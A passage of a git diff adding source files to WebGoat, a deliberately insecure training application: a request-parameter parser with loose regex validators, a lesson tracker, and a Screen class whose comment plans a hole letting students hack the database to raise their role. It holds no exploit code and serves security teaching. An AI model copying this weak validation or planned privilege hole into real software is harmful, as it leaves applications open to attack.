+	public ParameterParser(ServletRequest request)
+	{
+		this.request = request;
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	private String clean(String s)
+	{
+		StringBuffer clean = new StringBuffer();
+
+		for (int loop = 0; loop < s.length(); loop++)
+		{
+			char c = s.charAt(loop);
+
+			if (Character.isLetterOrDigit(c) || Character.isWhitespace(c) || (ALLOWED_CHARACTERS.indexOf(c) != -1))
+			{
+				clean.append(c);
+			} else
+			{
+				clean.append('.');
+			}
+		}
+
+		return (clean.toString());
+	}
+
+	/**
+	 * Gets the named parameter value as a boolean
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @return the parameter value as a boolean
+	 * @exception ParameterNotFoundException
+	 *                if the parameter was not found
+	 */
+	public boolean getBooleanParameter(String name) throws ParameterNotFoundException
+	{
+		return new Boolean(getStringParameter(name)).booleanValue();
+	}
+
+	/**
+	 * Gets the named parameter value as a boolean, with a default. Returns the
+	 * default value if the parameter is not found.
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @param def
+	 *            the default parameter value
+	 * @return the parameter value as a boolean, or the default
+	 */
+	public boolean getBooleanParameter(String name, boolean def)
+	{
+		try
+		{
+			return getBooleanParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
+	}
+
+	/**
+	 * Gets the booleanSubParameter attribute of the ParameterParser object
+	 * 
+	 * @param first
+	 *            Description of the Parameter
+	 * @param next
+	 *            Description of the Parameter
+	 * @param def
+	 *            Description of the Parameter
+	 * @return The booleanSubParameter value
+	 */
+	public boolean getBooleanSubParameter(String first, String next, boolean def)
+	{
+		try
+		{
+			return new Boolean(getSubParameter(first, next)).booleanValue();
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
+	}
+
+	/**
+	 * Gets the named parameter value as a byte
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @return the parameter value as a byte
+	 * @exception ParameterNotFoundException
+	 *                if the parameter was not found
+	 * @exception NumberFormatException
+	 *                if the parameter value could not be converted to a byte
+	 */
+	public byte getByteParameter(String name) throws ParameterNotFoundException, NumberFormatException
+	{
+		return Byte.parseByte(getStringParameter(name));
+	}
+
+	/**
+	 * Gets the named parameter value as a byte, with a default. Returns the
+	 * default value if the parameter is not found or cannot be converted to a
+	 * byte.
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @param def
+	 *            the default parameter value
+	 * @return the parameter value as a byte, or the default
+	 */
+	public byte getByteParameter(String name, byte def)
+	{
+		try
+		{
+			return getByteParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
+	}
+
+	/**
+	 * Gets the named parameter value as a char
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @return the parameter value as a char
+	 * @exception ParameterNotFoundException
+	 *                if the parameter was not found or was the empty string
+	 */
+	public char getCharParameter(String name) throws ParameterNotFoundException
+	{
+		String param = getStringParameter(name);
+
+		if (param.length() == 0)
+		{
+			throw new ParameterNotFoundException(name + " is empty string");
+		} else
+		{
+			return (param.charAt(0));
+		}
+	}
+
+	/**
+	 * Gets the named parameter value as a char, with a default. Returns the
+	 * default value if the parameter is not found.
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @param def
+	 *            the default parameter value
+	 * @return the parameter value as a char, or the default
+	 */
+	public char getCharParameter(String name, char def)
+	{
+		try
+		{
+			return getCharParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
+	}
+
+	/**
+	 * Gets the classNameParameter attribute of the ParameterParser object
+	 * 
+	 * @param name
+	 *            Description of the Parameter
+	 * @return The classNameParameter value
+	 */
+	public String getClassNameParameter(String name) throws ParameterNotFoundException
+	{
+		String p = getStringParameter(name);
+		StringTokenizer st = new StringTokenizer(p);
+
+		return (st.nextToken().trim());
+	}
+
+	// FIXME: check for [a-zA-Z].([a-zA-Z])*
+
+	/**
+	 * Gets the classNameParameter attribute of the ParameterParser object
+	 * 
+	 * @param name
+	 *            Description of the Parameter
+	 * @param def
+	 *            Description of the Parameter
+	 * @return The classNameParameter value
+	 */
+	public String getClassNameParameter(String name, String def)
+	{
+		try
+		{
+			return getClassNameParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
+	}
+
+	/**
+	 * Gets the named parameter value as a double
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @return the parameter value as a double
+	 * @exception ParameterNotFoundException
+	 *                if the parameter was not found
+	 * @exception NumberFormatException
+	 *                if the parameter could not be converted to a double
+	 */
+	public double getDoubleParameter(String name) throws ParameterNotFoundException, NumberFormatException
+	{
+		return new Double(getStringParameter(name)).doubleValue();
+	}
+
+	/**
+	 * Gets the named parameter value as a double, with a default. Returns the
+	 * default value if the parameter is not found.
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @param def
+	 *            the default parameter value
+	 * @return the parameter value as a double, or the default
+	 */
+	public double getDoubleParameter(String name, double def)
+	{
+		try
+		{
+			return getDoubleParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
+	}
+
+	/**
+	 * Gets the named parameter value as a float
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @return the parameter value as a float
+	 * @exception ParameterNotFoundException
+	 *                if the parameter was not found
+	 * @exception NumberFormatException
+	 *                if the parameter could not be converted to a float
+	 */
+	public float getFloatParameter(String name) throws ParameterNotFoundException, NumberFormatException
+	{
+		return new Float(getStringParameter(name)).floatValue();
+	}
+
+	/**
+	 * Gets the named parameter value as a float, with a default. Returns the
+	 * default value if the parameter is not found.
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @param def
+	 *            the default parameter value
+	 * @return the parameter value as a float, or the default
+	 */
+	public float getFloatParameter(String name, float def)
+	{
+		try
+		{
+			return getFloatParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
+	}
+
+	/**
+	 * Gets the named parameter value as an IP String, with a default. Returns
+	 * the default value if the parameter is not found or is the empty string.
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @param def
+	 *            the default parameter value
+	 * @return the parameter value as a String, or the default
+	 */
+	public String getIPParameter(String name, String def)
+	{
+		try
+		{
+			return getIPParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
+	}
+
+	/**
+	 * Gets the named parameter value as an IP String
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @return the parameter value as a valid IP String or an Empty string if
+	 *         invalid
+	 * @exception ParameterNotFoundException
+	 *                if the parameter was not found or was the empty string
+	 */
+	public String getIPParameter(String name) throws ParameterNotFoundException
+	{
+		boolean valid = true;
+		String[] values = request.getParameterValues(name);
+		String value;
+
+		if (values == null)
+		{
+			throw new ParameterNotFoundException(name + " not found");
+		} else if (values[0].length() == 0)
+		{
+			throw new ParameterNotFoundException(name + " was empty");
+		} else
+		{
+			// trim illegal characters
+			value = clean(values[0].trim());
+
+			if (value.indexOf("&") > 0)
+			{
+				// truncate additional parameters that follow &
+				value = value.substring(0, value.indexOf("&"));
+			}
+
+			// validate the IP ex: 124.143.12.254
+			int startIndex = 0;
+			int endIndex = 0;
+			int octetCount = 0;
+			int octetValue;
+			String octet;
+
+			// if no .'s then it's not an IP
+			if (value.indexOf(".") >= 0)
+			{
+				while ((valid == true) && (octetCount < 4))
+				{
+					endIndex = value.indexOf(".", startIndex);
+
+					if (endIndex == -1)
+					{
+						endIndex = value.length();
+					}
+
+					octet = value.substring(startIndex, endIndex);
+					startIndex = endIndex + 1;
+
+					try
+					{
+						octetValue = Integer.parseInt(octet);
+
+						if ((octetValue <= 0) || (octetValue >= 256))
+						{
+							valid = false;
+						}
+					}
+					catch (Exception e)
+					{
+						valid = false;
+					}
+
+					octetCount++;
+				}
+			} else
+			{
+				// Not a valid IP
+				valid = false;
+			}
+
+			// Check for any extra garbage. If the last octet was a large value
+			// it would be trapped by the above range check.
+			if (value.length() != endIndex)
+			{
+				valid = false;
+			}
+
+			return valid ? value : null;
+		}
+	}
+
+	/**
+	 * Gets the named parameter value as a int
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @return the parameter value as a int
+	 * @exception ParameterNotFoundException
+	 *                if the parameter was not found
+	 * @exception NumberFormatException
+	 *                if the parameter could not be converted to a int
+	 */
+	public int getIntParameter(String name) throws ParameterNotFoundException, NumberFormatException
+	{
+		return Integer.parseInt(getStringParameter(name));
+	}
+
+	/**
+	 * Gets the named parameter value as a int, with a default. Returns the
+	 * default value if the parameter is not found.
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @param def
+	 *            the default parameter value
+	 * @return the parameter value as a int, or the default
+	 */
+	public int getIntParameter(String name, int def)
+	{
+		try
+		{
+			return getIntParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
+	}
+
+	/**
+	 * Gets the named parameter value as a long
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @return the parameter value as a long
+	 * @exception ParameterNotFoundException
+	 *                if the parameter was not found
+	 * @exception NumberFormatException
+	 *                if the parameter could not be converted to a long
+	 */
+	public long getLongParameter(String name) throws ParameterNotFoundException, NumberFormatException
+	{
+		return Long.parseLong(getStringParameter(name));
+	}
+
+	/**
+	 * Gets the named parameter value as a long, with a default. Returns the
+	 * default value if the parameter is not found.
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @param def
+	 *            the default parameter value
+	 * @return the parameter value as a long, or the default
+	 */
+	public long getLongParameter(String name, long def)
+	{
+		try
+		{
+			return getLongParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
+	}
+
+	/**
+	 * Determines which of the required parameters were missing from the
+	 * request. Returns null if all the parameters are present.
+	 * 
+	 * @param requestuired
+	 *            Description of the Parameter
+	 * @return an array of missing parameters, or null if none are missing
+	 */
+	public String[] getMissingParameters(String[] requestuired)
+	{
+		Vector<String> missing = new Vector<String>();
+
+		for (int i = 0; i < requestuired.length; i++)
+		{
+			String val = getStringParameter(requestuired[i], null);
+
+			if (val == null)
+			{
+				missing.addElement(requestuired[i]);
+			}
+		}
+
+		if (missing.size() == 0)
+		{
+			return null;
+		} else
+		{
+			String[] ret = new String[missing.size()];
+			missing.copyInto(ret);
+
+			return ret;
+		}
+	}
+
+	/**
+	 * Gets the parameterNames attribute of the ParameterParser object
+	 * 
+	 * @return The parameterNames value
+	 */
+	public Enumeration getParameterNames()
+	{
+		if (request == null)
+		{
+			return (null);
+		}
+
+		return request.getParameterNames();
+	}
+
+	/**
+	 * Gets the parameterValues attribute of the ParameterParser object
+	 * 
+	 * @param name
+	 *            Description of the Parameter
+	 * @return The parameterValues value
+	 */
+	public String[] getParameterValues(String name)
+	{
+		if (request == null)
+		{
+			return (null);
+		}
+
+		return request.getParameterValues(name);
+	}
+
+	/**
+	 * Gets the rawParameter attribute of the ParameterParser object
+	 * 
+	 * @param name
+	 *            Description of the Parameter
+	 * @param def
+	 *            Description of the Parameter
+	 * @return The rawParameter value
+	 */
+	public String getRawParameter(String name, String def)
+	{
+		try
+		{
+			return getRawParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
+	}
+
+	/**
+	 * Gets the rawParameter attribute of the ParameterParser object
+	 * 
+	 * @param name
+	 *            Description of the Parameter
+	 * @return The rawParameter value
+	 * @exception ParameterNotFoundException
+	 *                Description of the Exception
+	 */
+	public String getRawParameter(String name) throws ParameterNotFoundException
+	{
+		String[] values = request.getParameterValues(name);
+
+		if (values == null)
+		{
+			throw new ParameterNotFoundException(name + " not found");
+		} else if (values[0].length() == 0)
+		{
+			throw new ParameterNotFoundException(name + " was empty");
+		}
+
+		return (values[0]);
+	}
+
+	/**
+	 * Gets the named parameter value as a short
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @return the parameter value as a short
+	 * @exception ParameterNotFoundException
+	 *                if the parameter was not found
+	 * @exception NumberFormatException
+	 *                if the parameter could not be converted to a short
+	 */
+	public short getShortParameter(String name) throws ParameterNotFoundException, NumberFormatException
+	{
+		return Short.parseShort(getStringParameter(name));
+	}
+
+	/**
+	 * Gets the named parameter value as a short, with a default. Returns the
+	 * default value if the parameter is not found.
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @param def
+	 *            the default parameter value
+	 * @return the parameter value as a short, or the default
+	 */
+	public short getShortParameter(String name, short def)
+	{
+		try
+		{
+			return getShortParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
+	}
+
+	/**
+	 * Gets the named parameter value as a String
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @return the parameter value as a String
+	 * @exception ParameterNotFoundException
+	 *                if the parameter was not found or was the empty string
+	 */
+	public String getStringParameter(String name) throws ParameterNotFoundException
+	{
+		String[] values = request.getParameterValues(name);
+		String value;
+
+		if (values == null)
+		{
+			throw new ParameterNotFoundException(name + " not found");
+		} else if (values[0].length() == 0)
+		{
+			throw new ParameterNotFoundException(name + " was empty");
+		} else
+		{
+			// trim illegal characters
+			value = clean(values[0].trim());
+
+			if (value.indexOf("&") > 0)
+			{
+				// truncate additional parameters that follow &
+				value = value.substring(0, value.indexOf("&"));
+			}
+
+			return value;
+		}
+	}
+
+	/**
+	 * Gets the named parameter value as a String, with a default. Returns the
+	 * default value if the parameter is not found or is the empty string.
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @param def
+	 *            the default parameter value
+	 * @return the parameter value as a String, or the default
+	 */
+	public String getStringParameter(String name, String def)
+	{
+		try
+		{
+			return getStringParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
+	}
+
+	/**
+	 * Gets the subParameter attribute of the ParameterParser object
+	 * 
+	 * @param first
+	 *            Description of the Parameter
+	 * @param next
+	 *            Description of the Parameter
+	 * @param def
+	 *            Description of the Parameter
+	 * @return The subParameter value
+	 */
+	public String getSubParameter(String first, String next, String def)
+	{
+		try
+		{
+			return getSubParameter(first, next);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
+	}
+
+	/**
+	 * Gets the parameter named 'next' following the parameter 'first'. Presumes
+	 * the structure: first=firstvalue&next=nextValue
+	 * 
+	 * @param first
+	 *            Description of the Parameter
+	 * @param next
+	 *            Description of the Parameter
+	 * @return The subParameter value
+	 * @exception ParameterNotFoundException
+	 *                Description of the Exception
+	 */
+	public String getSubParameter(String first, String next) throws ParameterNotFoundException
+	{
+		String[] values = request.getParameterValues(first);
+		String value;
+
+		if (values == null)
+		{
+			throw new ParameterNotFoundException(first + " not found");
+		} else if (values[0].length() == 0)
+		{
+			throw new ParameterNotFoundException(first + " was empty");
+		} else
+		{
+			value = clean(values[0].trim());
+
+			int idx = value.indexOf("&") + 1;
+
+			// index of first char of first sub-param name
+			if (idx == 0)
+			{
+				throw new ParameterNotFoundException("No subparameter key");
+			}
+
+			value = value.substring(idx);
+
+			// System.out.println("= = = = = =Parameter parser looking for " +
+			// next + " in " + value );
+			int nextValueIndex = value.indexOf(next + "=");
+
+			// System.out.println("= = = = = =Parameter parser nextValueIndex =
+			// " + nextValueIndex );
+			if (nextValueIndex < 0)
+			{
+				throw new ParameterNotFoundException("No subparameter value");
+			}
+
+			nextValueIndex += (next.length() + 1);
+
+			if (nextValueIndex >= 0)
+			{
+				value = value.substring(nextValueIndex);
+			} else
+			{
+				throw new ParameterNotFoundException(next + " not found");
+			}
+		}
+
+		if (value.indexOf("&") > 0)
+		{
+			// truncate additional parameters that follow &
+			value = value.substring(0, value.indexOf("&"));
+		}
+
+		// System.out.println("=-=-=-=-=ParameterParser returning value " +
+		// value );
+		return value;
+	}
+
+	/**
+	 * Gets the wordParameter attribute of the ParameterParser object
+	 * 
+	 * @param name
+	 *            Description of the Parameter
+	 * @return The wordParameter value
+	 */
+	public String getWordParameter(String name) throws ParameterNotFoundException
+	{
+		String p = getStringParameter(name);
+		StringTokenizer st = new StringTokenizer(p);
+
+		return (st.nextToken().trim());
+	}
+
+	// FIXME: check for [a-zA-Z]
+
+	/**
+	 * Gets the wordParameter attribute of the ParameterParser object
+	 * 
+	 * @param name
+	 *            Description of the Parameter
+	 * @param def
+	 *            Description of the Parameter
+	 * @return The wordParameter value
+	 */
+	public String getWordParameter(String name, String def)
+	{
+		try
+		{
+			return getWordParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
+	}
+
+	/**
+	 * Gets the specified parameter from the request and validates it against
+	 * the provided regular expression. If the regular expression check fails,
+	 * the default value is returned instead.
+	 * 
+	 * @param name
+	 *            The name of the parameter to retrieve from the request.
+	 * @param def
+	 *            The default value of the parameter.
+	 * @param regexpattern
+	 *            The precompiled regular expression to be used to validate the
+	 *            parameter.
+	 * @return The validated parameter value, or the default value if validation
+	 *         failed.
+	 */
+	private String getRegexParameter(String name, String def, Pattern regexpattern) throws ValidationException
+	{
+		try
+		{
+			return getRegexParameter(name, regexpattern);
+		}
+		catch (Exception e)
+		{
+			// System.out.println("Exception occured in defined pattern match");
+			// e.printStackTrace();
+			return def;
+		}
+	}
+
+	/**
+	 * Gets the specified parameter from the request and validates it against
+	 * the provided regular expression. If the regular expression check fails,
+	 * the default value is returned instead.
+	 * 
+	 * @param name
+	 *            The name of the parameter to retrieve from the request.
+	 * @param def
+	 *            The default value of the parameter.
+	 * @param regexpattern
+	 *            The precompiled regular expression to be used to validate the
+	 *            parameter.
+	 * @return The validated parameter value, or the default value if validation
+	 *         failed.
+	 */
+	private String getRegexParameter(String name, Pattern regexpattern) throws ParameterNotFoundException,
+																	   ValidationException
+	{
+		String param = getStringParameter(name);
+
+		if (regexpattern.matcher(param).matches())
+		{
+			return param;
+		} else
+		{
+			// System.out.println(param + " didn't match defined pattern.");
+			throw new ValidationException(name + " contained an invalid value");
+		}
+	}
+
+	public String getStrictAlphaParameter(String name, int maxLength) throws ParameterNotFoundException,
+																	 ValidationException
+	{
+		String alphaRegEx = "^[a-zA-Z\\s]{0," + maxLength + "}$";
+		Pattern alphaPattern = Pattern.compile(alphaRegEx);
+
+		return getRegexParameter(name, alphaPattern);
+	}
+
+	public String getStrictNumericParameter(String name, int maxLength) throws ParameterNotFoundException,
+																	   ValidationException
+	{
+		String numericRegEx = "^\\d{0," + maxLength + "}$";
+		Pattern numericPattern = Pattern.compile(numericRegEx);
+
+		return getRegexParameter(name, numericPattern);
+	}
+
+	private static final String SSNREGEX = "^\\d{3}-\\d{2}-\\d{4}$";
+
+	private static final Pattern Ssnpattern = Pattern.compile(SSNREGEX);
+
+	public String getSsnParameter(String name) throws ParameterNotFoundException, ValidationException
+	{
+		return getRegexParameter(name, Ssnpattern);
+	}
+
+	// Validates format for major brands of credit card.
+	// private static final String CCNREGEX =
+	// "^(?:(?<Visa>4\\d{3})|(?<Mastercard>5[1-5]\\d{2})|(?<Discover>6011)|(?<DinersClub>(?:3[68]\\d{2})|(?:30[0-5]\\d))|(?<AmericanExpress>3[47]\\d{2}))([
+	// -]?)(?(DinersClub)(?:\\d{6}\\1\\d{4})|(?(AmericanExpress)(?:\\d{6}\\1\\d{5})|(?:\\d{4}\\1\\d{4}\\1\\d{4})))$";
+	private static final String CCNREGEX = "^\\d{16}$";
+
+	private static final Pattern Ccnpattern = Pattern.compile(CCNREGEX);
+
+	public String getCcnParameter(String name) throws ParameterNotFoundException, ValidationException
+	{
+		return getRegexParameter(name, Ccnpattern);
+	}
+
+	private static final String ZIPREGEX = "^\\d{5}(-\\d{4})?$";
+
+	private static final Pattern Zippattern = Pattern.compile(ZIPREGEX);
+
+	public String getZipParameter(String name) throws ParameterNotFoundException, ValidationException
+	{
+		return getZipParameter(name, null);
+	}
+
+	public String getZipParameter(String name, String def) throws ValidationException
+	{
+		return getRegexParameter(name, def, Zippattern);
+	}
+
+	private static final String PHONEREGEX = "^\\(?[\\d]{3}\\)?[\\s-]?[\\d]{3}[\\s-]?[\\d]{4}$";
+
+	// Or this more forgiving pattern:
+	// private static final String PHONEREGEX = "^([\\-()+ 0-9x])+$";
+	private static final Pattern phonepattern = Pattern.compile(PHONEREGEX);
+
+	public String getPhoneParameter(String name) throws ParameterNotFoundException, ValidationException
+	{
+		return getPhoneParameter(name, null);
+	}
+
+	public String getPhoneParameter(String name, String def) throws ValidationException
+	{
+		return getRegexParameter(name, def, phonepattern);
+	}
+
+	private static final String EMAILREGEX = "^[\\w-]+(?:\\.[\\w-]+)*@(?:[\\w-]+\\.)+[a-zA-Z]{2,7}$";
+
+	private static final Pattern emailpattern = Pattern.compile(EMAILREGEX);
+
+	public String getEMailParameter(String name) throws ParameterNotFoundException, ValidationException
+	{
+		return getEMailParameter(name, null);
+	}
+
+	public String getEMailParameter(String name, String def) throws ValidationException
+	{
+		return getRegexParameter(name, def, emailpattern);
+	}
+
+	private static final String DATEREGEX = "([\\/ .,:0-9a-zA-Z])+$";
+
+	private static final Pattern datepattern = Pattern.compile(DATEREGEX);
+
+	public String getDateParameter(String name) throws ParameterNotFoundException, ValidationException
+	{
+		return getDateParameter(name, null);
+	}
+
+	public String getDateParameter(String name, String def) throws ValidationException
+	{
+		return getRegexParameter(name, def, datepattern);
+	}
+
+	private static final String URLREGEX =
+			"^(((https?)://)([-()_.!~*';/?:@&=+$,A-Za-z0-9])+)([).!';/?:,][[:blank:]])?$";
+
+	private static final Pattern URLpattern = Pattern.compile(URLREGEX);
+
+	public String getURLParameter(String name) throws ParameterNotFoundException, ValidationException
+	{
+		return getURLParameter(name, null);
+	}
+
+	public String getURLParameter(String name, String def) throws ValidationException
+	{
+		return getRegexParameter(name, def, URLpattern);
+	}
+
+	protected static String htmlEncode(String s)
+	{
+		return HtmlEncoder.encode(s);
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @return Description of the Return Value
+	 */
+	public String toString()
+	{
+		StringBuffer s = new StringBuffer("[");
+		Enumeration e = getParameterNames();
+
+		while (e.hasMoreElements())
+		{
+			String key = (String) e.nextElement();
+			s.append(key + "=" + getParameterValues(key)[0]);
+
+			// FIXME: Other values?
+			if (e.hasMoreElements())
+			{
+				s.append(",");
+			}
+		}
+
+		s.append("]");
+
+		return (s.toString());
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param request
+	 *            Description of the Parameter
+	 */
+	public void update(ServletRequest request)
+	{
+		this.request = request;
+	}
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/RandomLessonTracker.java b/main/project/JavaSource/org/owasp/webgoat/session/RandomLessonTracker.java
new file mode 100755
index 000000000..05f7b1a3d
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/session/RandomLessonTracker.java
@@ -0,0 +1,90 @@
+package org.owasp.webgoat.session;
+
+import java.util.HashMap;
+import java.util.Map;
+import java.util.Properties;
+
+public class RandomLessonTracker extends LessonTracker {
+
+	private String[] stages;
+	
+	private String stage;
+	
+	private Map<String, Boolean> completed = new HashMap<String, Boolean>();
+	
+	public RandomLessonTracker(String[] stages) {
+		if (stages == null)
+			stages = new String[0];
+		this.stages = stages;
+	}
+	
+	public void setStage(String stage) {
+		this.stage = stage;
+	}
+	
+	public String getStage() {
+		if (this.stage == null && stages.length > 0)
+			return stages[0];
+		return this.stage;
+	}
+	
+	public void setStageComplete(String stage, boolean complete) {
+		completed.put(stage, Boolean.valueOf(complete));
+		for (int i=0; i<stages.length-1; i++)
+			if (stages[i].equals(stage))
+				setStage(stages[i+1]);
+	}
+	
+	public boolean hasCompleted(String stage) {
+		Boolean complete = completed.get(stage);
+		return complete == null ? false : complete.booleanValue();
+	}
+	
+	@Override
+	public boolean getCompleted() {
+		for (int i=0; i<stages.length; i++)
+			if (!hasCompleted(stages[i]))
+				return false;
+		return true;
+	}
+	
+	@Override
+	public void setCompleted(boolean complete) {
+		if (complete == true)
+			throw new UnsupportedOperationException("Use individual stage completion instead");
+		for (int i=0;i<stages.length; i++)
+			setStageComplete(stages[i], false);
+		setStage(stages[0]);
+	}
+	
+    protected void setProperties(Properties props, Screen screen) {
+	    super.setProperties(props, screen);
+	    for (int i=0; i<stages.length; i++) {
+	    	String p = props.getProperty(screen.getTitle() + "." + stages[i] + ".completed");
+	    	if (p != null) {
+	    		setStageComplete(stages[i], Boolean.valueOf(p));
+	    	}
+	    }
+	    setStage(props.getProperty(screen.getTitle() + ".stage"));
+    }
+    
+    public void store(WebSession s, Screen screen, String user) {
+    	for (int i=0; i<stages.length; i++) {
+    		if (hasCompleted(stages[i]))
+    			lessonProperties.setProperty(screen.getTitle() + "." + stages[i] + ".completed", Boolean.TRUE.toString());
+    	}
+		lessonProperties.setProperty(screen.getTitle() + ".stage", getStage());
+		super.store(s, screen, user);
+    }
+    
+    public String toString() {
+    	StringBuffer buff = new StringBuffer();
+    	buff.append(super.toString());
+    	for (int i=0; i<stages.length; i++) {
+    		buff.append("    - completed " + stages[i] + " :....... " + hasCompleted(stages[i]) + "\n");
+    	}
+    	buff.append("    - currentStage:....... " + getStage() + "\n");
+    	return buff.toString();
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/Screen.java b/main/project/JavaSource/org/owasp/webgoat/session/Screen.java
new file mode 100644
index 000000000..3004d6a89
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/session/Screen.java
@@ -0,0 +1,336 @@
+package org.owasp.webgoat.session;
+
+import java.io.PrintWriter;
+import java.util.Properties;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.HtmlColor;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.A;
+import org.apache.ecs.html.Font;
+import org.apache.ecs.html.IMG;
+import org.owasp.webgoat.lessons.AbstractLesson;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created    October 28, 2003
+ */
+public abstract class Screen
+{
+
+    /**
+     *  Description of the Field
+     */
+    public static int MAIN_SIZE = 375;
+
+    //private Head head;
+    private Element content;
+
+    final static IMG logo = new IMG("images/aspectlogo-horizontal-small.jpg")
+	    .setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0);
+
+
+    /**
+     *  Constructor for the Screen object
+     */
+
+    public Screen()
+    {}
+
+
+    // FIXME: Each lesson should have a role assigned to it.  Each user/student
+    //        should also have a role(s) assigned.  The user would only be allowed
+    // 		  to see lessons that correspond to their role.  Eventually these roles
+    //		  will be stored in the internal database.  The user will be able to hack
+    // 		  into the database and change their role.  This will allow the user to
+    //		  see the admin screens, once they figure out how to turn the admin switch on.
+    public abstract String getRole();
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+
+    protected abstract Element createContent(WebSession s);
+
+
+    /**
+     *  Gets the credits attribute of the Screen object
+     *
+     * @return    The credits value
+     */
+    public abstract Element getCredits();
+
+
+    /**
+     *  Creates a new lessonTracker object.
+     *
+     * @param  props  The properties file that was used to persist the user data.
+     * @return        Description of the Return Value
+     */
+
+    public LessonTracker createLessonTracker(Properties props)
+    {
+
+	// If the lesson had any specialized properties in the user persisted properties,
+	// now would be the time to pull them out.
+
+	return createLessonTracker();
+    }
+
+
+    /**
+     *  This allows the screens to provide a custom LessonTracker object if needed.
+     *
+     * @return    Description of the Return Value
+     */
+    public LessonTracker createLessonTracker()
+    {
+	return new LessonTracker();
+    }
+
+
+    /**
+     *  Gets the lessonTracker attribute of the AbstractLesson object
+     *
+     * @param  userName  Description of the Parameter
+     * @return           The lessonTracker value
+     */
+
+    public LessonTracker getLessonTracker(WebSession s)
+    {
+	UserTracker userTracker = UserTracker.instance();
+	return userTracker.getLessonTracker(s, this);
+    }
+
+
+    public LessonTracker getLessonTracker(WebSession s, String userNameOverride)
+    {
+	UserTracker userTracker = UserTracker.instance();
+	return userTracker.getLessonTracker(s, userNameOverride, this);
+    }
+
+
+    public LessonTracker getLessonTracker(WebSession s, AbstractLesson lesson)
+    {
+	UserTracker userTracker = UserTracker.instance();
+	return userTracker.getLessonTracker(s, lesson);
+    }
+
+
+    /**
+     *  Fill in a descriptive title for this lesson
+     *
+     * @return    The title value
+     */
+    public abstract String getTitle();
+
+
+    protected void setContent(Element content)
+    {
+	this.content = content;
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @return    Description of the Return Value
+     */
+
+    protected Element makeLogo()
+    {
+
+	return new A("http://www.aspectsecurity.com/webgoat.html", logo);
+    }
+
+
+    public String getSponsor()
+    {
+	return "Aspect Security";
+    }
+
+
+    public String getSponsorLogoResource()
+    {
+	return "images/aspectlogo-horizontal-small.jpg";
+    }
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+
+    protected Element makeMessages(WebSession s)
+    {
+
+	if (s == null)
+	{
+
+	    return (new StringElement(""));
+	}
+
+	Font f = new Font().setColor(HtmlColor.RED);
+
+	String message = s.getMessage();
+
+	f.addElement(message);
+
+	return (f);
+    }
+
+
+    /**
+     *  Returns the content length of the the html.
+     *
+     */
+
+    public int getContentLength()
+    {
+	return content.toString().length();
+    }
+
+
+    /**
